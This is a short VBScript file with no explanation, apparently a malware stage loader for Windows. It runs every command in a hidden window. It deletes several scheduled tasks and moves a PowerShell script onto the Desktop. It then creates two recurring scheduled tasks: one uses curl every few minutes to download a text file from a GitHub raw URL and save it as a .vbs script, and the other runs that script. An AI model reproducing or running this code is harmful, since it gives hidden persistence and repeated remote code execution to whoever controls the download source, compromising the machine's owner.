Set sf = CreateObject("WScript.Shell")
sf.Run ("schtasks /Delete /tn ""A2"" /F"), 0, True

Set sp = CreateObject("WScript.Shell")
sp.Run ("schtasks /Delete /tn ""A3"" /F"), 0, True

Set sk = CreateObject("WScript.Shell")
sk.Run ("schtasks /Delete /tn ""A4"" /F"), 0, True

Set sz = CreateObject("WScript.Shell")
sz.Run ("cmd /c move %tmp%\R1.ps1 %USERPROFILE%\Desktop\R1.ps1"), 0, True

Set sy = CreateObject("WScript.Shell")
sy.Run ("schtasks /Create /sc minute /mo 4 /tn ""A5"" /tr ""curl https://raw.githubusercontent.com/section10housing/b1/master/z3.txt -o %tmp%\z3.vbs"" /F"), 0, False

Set s1 = CreateObject("WScript.Shell")
s1.Run ("schtasks /Create /sc minute /mo 6 /tn ""A6"" /tr ""%tmp%\z3.vbs"" /F"), 0, False



